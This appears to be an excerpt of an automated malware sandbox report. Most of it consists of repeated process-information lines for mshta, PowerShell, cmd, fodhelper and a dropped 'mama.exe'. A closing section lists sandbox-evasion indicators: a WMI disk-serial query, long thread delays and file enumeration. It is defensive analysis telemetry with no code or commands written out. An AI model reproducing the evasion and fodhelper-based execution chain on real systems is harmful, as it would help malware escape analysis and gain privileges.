          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\wbem\WMIC.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'  (2 occurrences)
          Source: C:\Windows\System32\OpenSSH\ssh.exe  Thread delayed: delay time: 922337203685477  (2 occurrences)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (4 occurrences)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1647
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 696
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1271
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6297
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3344
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4905
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4754
          Source: C:\Users\user\AppData\Roaming\mama.exe  Window / User API: threadDelayed 9777
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6680  Thread sleep time: -922337203685477s >= -30000s  (2 occurrences)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312  Thread sleep count: 1647 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868  Thread sleep count: 696 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764  Thread sleep count: 36 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468  Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816  Thread sleep count: 1271 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1072  Thread sleep count: 146 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712  Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7276  Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644  Thread sleep time: -20291418481080494s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972  Thread sleep time: -23058430092136925s >= -30000s
          Source: C:\Windows\System32\svchost.exe  File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed  (5 occurrences)
          Source: C:\Users\user\AppData\Roaming\mama.exe  Code function: 46_2_0306E190 FindFirstFileW,FindClose,46_2_0306E190
          Source: C:\Users\user\AppData\Roaming\mama.exe  Code function: 46_2_0306DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,46_2_0306DBC4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
